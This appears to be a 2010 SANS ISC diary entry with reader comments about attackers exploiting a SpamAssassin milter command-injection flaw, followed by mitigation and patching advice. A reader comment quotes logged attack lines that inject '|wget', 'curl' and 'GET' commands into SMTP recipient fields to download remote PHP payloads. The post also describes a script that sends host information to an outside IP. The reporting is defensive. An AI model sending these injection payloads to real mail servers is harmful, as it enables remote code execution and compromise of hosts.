Observant reader Roy caught an interesting exploit attempt against his SMTP server. His review of the logs turned up this: Messages rejected to recipient: root+:|wget Handler Bojan notes that it appears that the bad guys have started to actively exploit SpamAssassin's milter vulnerability that has been published last weekend (more details at http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html). The perl script collects some information about the local host and tries to send it to 203.59.123.114 on port 80 -- this host appears to be unreachable at the moment though. Cheers, I will be teaching next: Intrusion Detection In-Depth - SANS Cyber Defence Australia 2022 |
Adrien de Beaupre 353 Posts ISC Handler Mar 15th 2010 |
Thread locked Subscribe |
Mar 15th 2010 1 decade ago |
On FreeBSD, a fix hasn't yet made it into ports. Is there any mitigation against this attack aside from disabling spamass-milter for the time being?
|
parseword 9 Posts |
Quote |
Mar 15th 2010 1 decade ago |
I'm using spamass-milter on CentOS 5.x (a.k.a. Red Hat Enterprise Linux). Fortunately, the RPM as distributed by Red Hat doesn't use the "-x" flag. *whew* Just check your /etc/sysconfig/spamass-milter EXTRA_FLAGS to see if you added it yourself.
To double-check I attempted the exploit described at the Full Disclosure link (above) and it didn't work. |
parseword 3 Posts |
Quote |
Mar 16th 2010 1 decade ago |
I havve logged attempts to use curl as well.
rcpt to: root+:"|wget http://213.186.44.xxx/blue.php" rcpt to: root+:"|wget http://61.100.185.xxx/busy-1.php" rcpt to: root+:"|GET http://61.100.185.xxx/busy-2.php" rcpt to: root+:"|curl http://61.100.185.xxx/busy-3.php" |
Travis 5 Posts |
Quote |
Mar 16th 2010 1 decade ago |
@BillBixby: The preliminary patch linked to in the article applies nicely within the port. Just copy it to ${PORTSDIR}/mail/spamass-milter/files/patch-popen and force a rebuild and reinstall of spamass-milter. Tested here on a couple of MTAs (8R-p2 base Sendmail).
|
Matt 7 Posts |
Quote |
Mar 18th 2010 1 decade ago |
Sign Up for Free or Log In to start participating in the conversation!